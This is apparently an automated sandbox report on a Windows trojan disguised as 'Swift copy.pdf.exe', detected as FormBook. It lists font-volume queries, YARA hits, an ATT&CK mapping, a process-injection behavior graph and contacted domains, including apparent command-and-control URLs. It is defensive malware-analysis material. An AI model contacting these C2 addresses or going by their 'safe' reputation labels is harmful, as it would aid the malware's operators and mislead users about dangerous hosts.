          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading21OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information14Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385261 Sample: Swift copy.pdf.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 36 www.marktheoilguy.com 2->36 38 marktheoilguy.com 2->38 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 10 other signatures 2->54 11 Swift copy.pdf.exe 3 2->11         started        signatures3 process4 file5 34 C:\Users\user\...\Swift copy.pdf.exe.log, ASCII 11->34 dropped 66 Injects a PE file into a foreign processes 11->66 15 Swift copy.pdf.exe 11->15         started        18 Swift copy.pdf.exe 11->18         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 20 explorer.exe 15->20 injected process9 dnsIp10 40 www.stepmed.life 5.101.123.53, 80 PAGM-ASEE Estonia 20->40 42 agenciaorange.net 51.222.80.112, 49753, 80 OVHFR France 20->42 44 10 other IPs or domains 20->44 56 System process connects to network (likely due to code injection or exploit) 20->56 58 Performs DNS queries to domains with low reputation 20->58 24 cscript.exe 12 20->24         started        28 autoconv.exe 20->28         started        signatures11 process12 dnsIp13 46 www.stepmed.life 24->46 60 Modifies the context of a thread in another process (thread injection) 24->60 62 Maps a DLL or memory area into another process 24->62 64 Tries to detect virtualization through RDTSC time measurements 24->64 30 cmd.exe 1 24->30         started        signatures14 process15 process16 32 conhost.exe 30->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Swift copy.pdf.exe31%VirustotalBrowse
          Swift copy.pdf.exe21%ReversingLabsWin32.Trojan.AgentTesla
          Swift copy.pdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.Swift copy.pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          wapgoals.com0%VirustotalBrowse
          marktheoilguy.com0%VirustotalBrowse
          www.rileysboutique.com0%VirustotalBrowse
          technomark.xyz0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.indiafoodtraveling.com/px.js?ch=20%Avira URL Cloudsafe
          http://www.tiro.comF0%Avira URL Cloudsafe
          http://www.indiafoodtraveling.com/px.js?ch=10%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
          http://www.criticalredux.com/ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.carterandcone.como.n0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/n0%Avira URL Cloudsafe
          www.wapgoals.com/ifne/0%Avira URL Cloudsafe
          http://www.carterandcone.comdjq0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/z0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.wapgoals.com/ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://www.carterandcone.comL0%Avira URL Cloudsafe
          http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Y0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
          http://www.tiro.comS~0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Aq0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
          http://www.rileysboutique.com/ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
          http://www.carterandcone.comu0%Avira URL Cloudsafe
          http://www.fontbureau.commH0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
          http://www.carterandcone.coms0%URL Reputationsafe
          http://www.carterandcone.coms0%URL Reputationsafe
          http://www.carterandcone.coms0%URL Reputationsafe
          http://www.zhongyicts.com.cns0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
          http://www.carterandcone.coma-d0%Avira URL Cloudsafe
